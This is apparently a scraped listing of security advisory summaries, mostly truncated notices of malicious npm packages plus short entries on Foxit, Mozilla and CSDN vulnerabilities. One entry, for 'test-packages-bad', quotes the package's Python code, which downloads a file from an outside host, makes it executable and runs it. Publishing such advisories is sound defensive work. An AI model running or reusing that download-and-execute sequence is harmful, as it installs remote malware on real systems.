Malicious code in parallel-workers (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis abf4ac32d4bbbf2bca51efed2166f670c707230f7da2b87c1318cbe8ca9dade1 The OpenSSF Package Analysis project identified 'parallel-workers' @ 99.99.101 npm as malicious. It is considered malicious because: - The packa...

Malicious code in redirect-support (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis d6c36381ca8139def8823ca52a07b58b0dc131a8960f3deb17f749cbe3870794 The OpenSSF Package Analysis project identified 'redirect-support' @ 1.0.3 npm as malicious. It is considered malicious because: - The package...

Malicious code in @expressions/excel-functions (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 0f285f6202227757b1ae10391ea069ae841e5b19a58529e5ce7b0f0a37e48c91 The OpenSSF Package Analysis project identified '@expressions/excel-functions' @ 3.0.0 npm as malicious. It is considered malicious because: - T...

Foxit PDF Reader 资源管理错误漏洞

Foxit PDF Reader is China Foxit Foxit company a PDF reader. A remote code execution vulnerability exists in Foxit PDF Reader, which can be exploited by an attacker to execute code in the current process...

Malicious code in kuna-chart-header (npm)

--- -= Per source details. Do not edit below this line.=- Source: checkmarx 7b6783077178ab41482bc0e611e487453d9b0254e1e1ad5684b89472b002b2b4 Malicious packages campaign since 2021 targeting developers, steals source code and secrets Source: ghsa-malware...

Malicious code in @chegg/wtai-upload-widget (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ed3e4233e6f2d188d7f2bab940bf8574017cf73a97b440daddc7f4e3176075a3 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in fc-account-selector (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e2a2b9137afe6979e5b25e3e2aba4da1a9152feee7e21f1fc61c909273642d2c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in test-npm-com-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: checkmarx eb86ecfecc56220476e3c33bd4f86f95c17be6c7a9a7a3cdc9ca822205076380 Malicious packages campaign since 2021 targeting developers, steals source code and secrets Source: ossf-package-analysis...

Malicious code in mypy-action (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1e1b919537a89780d36cd0352b5a2a78fb75def0b31c115111e26acb0c979c0d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in wall-e.api (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7317689c13174693567501f3ef7699b95a22d64ca1c24ee435cea015afcd38a2 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in ytreader (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6a69dfe4d469d389b8db7b4e27084c0d17aa03c753dc0336a622e08402e04b24 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in startrek-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 677916f3c3652c9c9adf72499bd52d0411e53c57df7ff1a301df7dfb9d64474d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in ticket-parser2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ee92fd5b97c5234a0a301b915037b0f7285c820216158c9bef86dc7c08e16661 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in errorboosterclient (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware f6ad53c61c65de783410bb712f1628578d9bb4ce0e63f7bd2acd059433433392 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in django-template-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b8a4058c9a8f986347dd22fe461b25c3ae525959ed7a05da257b79c7aa4d9aad Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in django-pgaas (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware af2de826396a82e1611c1de3d77a409bafde0f0f0cc57a5623b149b90a48d3e1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in cyson (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 9135731397c4add9bfb9b734264e5f8c6b5590900d7b3d5066d8aaa1fc54a094 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious Package

Overview test-packages-bad is a malicious package. This package downloads and runs malicious code on the victim host. Malicious Code python import os os.system"wget https://dark.devsecwise.com/cronjob.out /dev/null 2&1" os.system"chmod +x /home/$he/.metasploit/cronjob.out" os.system"./cronjob.out...

Mozilla: Drag and dropping an image could have resulted in the dropped object being an executable

The Mozilla Foundation Security Advisory describes this flaw as: If a user was convinced to drag and drop an image to their desktop or other folder, the resulting object could have been changed into an executable script, which would have run arbitrary code after the user clicked it...

Csdn App 跨站脚本漏洞

Csdn App is an It community software for cell phones from CN Beijing Innovative Lezhi Network Technology Csdn. Csdn APP suffers from a cross-site scripting vulnerability that stems from the lack of proper validation of client data by the WEB application. An attacker can exploit this vulnerability...